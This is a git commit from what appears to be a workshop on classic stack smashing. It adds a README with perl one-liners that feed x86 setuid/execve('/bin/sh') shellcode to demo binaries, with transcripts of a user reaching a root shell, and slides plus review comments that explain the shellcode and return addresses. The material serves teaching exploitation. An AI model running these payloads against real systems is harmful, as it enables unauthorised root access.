minor improvements

Ward Wouts 2023-03-08 10:32:57 +01:00
parent cce16c40ff
commit 03cd6ada44
2 changed files with 64 additions and 16 deletions

README.md (new file, 42 lines)

@ -0,0 +1,42 @@
## Demo
Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.
```
atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit
```
```
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`
```
## DIY
```
export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
gdb ./diy
atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo diy foo.txt setup.sh shellcode.txt shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
```
Test without the dodgy push EBX
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`
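Review bot: the last `./demo` invocation (the "Test without the dodgy push EBX" line) sits outside any code fence, unlike the Demo and DIY blocks above it, so it renders as a wrapped paragraph; put it in its own ``` block with a short heading. While in this hunk: the return addresses differ from block to block (`\x30\xcb\xff\xff` in Demo, `\x24\xdc\xff\xff` in DIY, `\xdc\xcd\xff\xff` in the final test) because they depend on the stack layout of the shell that runs the binary (environment size, argv length, and ASLR being off), so the README should say they were read from gdb on this machine and must be re-derived elsewhere; the `(cat foo.txt;cat) |./diy` idiom also deserves one sentence explaining that the second `cat` keeps stdin open so the spawned root shell does not exit on EOF the way the plain `cat foo.txt |./diy` run does.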


@ -124,22 +124,30 @@ name: inverse
layout: true layout: true
class: center, middle, inverse class: center, middle, inverse
--- ---
# Old skool stack smashing # ♫ Stack smashing like it's 1999 ♫
Ward Wouts<br> Ward Wouts<br>
https://wizeazz.nl/smash/ https://wizeazz.nl/smash/
--- ---
# Agenda # Agenda
1. Introduction [//]: # (This is a markdown comment.)
1. What is a stack? [//]: # (A proper markdown comment needs the empty line above it.)
1. How does this work? [//]: # (Two spaces at the end of a line are a linebreak in markdown.)
1. Vulnerable fuctions
1. Now what can we do with this? Introduction
1. Shellcode? What is a stack?
1. Endianness? How does this work?
1. Demo Vulnerable fuctions
1. DIY Now what can we do with this?
1. Quick Radare2 reference Shellcode?
Endianness?
Exploitation workflow
Demo
Protections
DIY
Quick Radare2 reference
Quick GDB reference
Shellcode explained
--- ---
# Introduction # Introduction
--- ---
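Review bot: the new agenda drops the `1.` list markers but does not add the two trailing spaces that the new comment line itself says markdown needs for a line break, so the items from "Introduction" to "Shellcode explained" will render as a single run-on paragraph; either keep the `1.` prefixes (markdown numbers them automatically) or add the trailing spaces. "Vulnerable fuctions" is also still misspelled on the new side; "functions".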
@ -513,10 +521,8 @@ template: inverse
.right-column[ .right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
``` ```
/* /* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) * - 37 bytes - xgc@gotfault.net */
* - 37 bytes - xgc@gotfault.net
*/
"\x6a\x17" // push $0x17 "\x6a\x17" // push $0x17
"\x58" // pop %eax "\x58" // pop %eax
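Review bot: the collapsed comment keeps the old block-style leading `*` on its second line (` * - 37 bytes - xgc@gotfault.net */`), which reads oddly now that the first line already carries text after `/*`; either keep the three-line block comment or move the byte count and credit onto the same line. The 37-byte figure does match the bytes listed in the slide (7 for setuid, 6 for setgid, 24 for execve).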
@ -590,7 +596,7 @@ mov %esp, %ebx Point EBX at command string
push %edx Push NULL to stack (no more arguments) push %edx Push NULL to stack (no more arguments)
push %ebx Push pointer to command str push %ebx Push pointer to command str
mov %esp, %ecx Point ECX at arg list mov %esp, %ecx Point ECX at arg list
int $0x80A Execute command in EAX int $0x80 Execute command in EAX
``` ```
Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to fill that 32-bit word. The EDX that is set to 0 and pushed makes up for the null string terminator. Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to fill that 32-bit word. The EDX that is set to 0 and pushed makes up for the null string terminator.
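Review bot: `int $0x80A` to `int $0x80` is the right fix; while here, the explanation line under the table could say what EDX is doing at the syscall itself: besides supplying the NUL that terminates `/bin//sh` and the NULL that ends the argv array, EDX is still 0 when `int $0x80` executes, so execve's third argument (envp) is NULL. That is the reason the `xor %edx,%edx` comes before the string pushes and EDX is never touched afterwards.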